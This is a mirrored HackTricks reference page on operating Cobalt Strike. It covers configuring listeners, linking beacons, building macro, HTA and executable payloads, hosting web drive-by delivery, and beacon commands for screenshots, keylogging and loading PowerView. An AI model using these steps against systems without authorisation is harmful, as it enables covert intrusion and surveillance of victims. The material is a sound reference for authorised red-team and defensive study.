mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
1.9 KiB
1.9 KiB
Cobalt Strike
Listeners
C2 Listeners
Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
Peer2Peer Listeners
The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
Cobalt Strike -> Listeners -> Add/Edit then you need to select the TCP or SMB beacons
- The TCP beacon will set a listener in the port selected. To connect to a TCP beacon use the command
connect <ip> <port>from another beacon - The smb beacon will listen in a pipename with the selected name. To connect to a SMB beacon you need to use the command
link [target] [pipe].
Generate & Host payloads
Generate payloads in files
Attacks -> Packages ->
HTMLApplicationfor HTA filesMS Office Macrofor an office document with a macroWindows Executablefor a .exe, .dll orr service .exeWindows Executable (S)for a stageless .exe, .dll or service .exe (better stageless than staged, less IoCs)
Generate & Host payloads
Attacks -> Web Drive-by -> Scripted Web Delivery (S) This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
Host Payloads
If you already has the file you want to host in a web sever just go to Attacks -> Web Drive-by -> Host File and select the file to host and web server config.
Beacon Options
# Execute local .NET binary
execute-assembly </path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
screenshot # Take a single screenshot
screenwatch # Take periodic screenshots of desktop
## Go to View -> Screenshots to see them
# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
# Import Powershell module
powershell-import C:\path\to\PowerView.ps1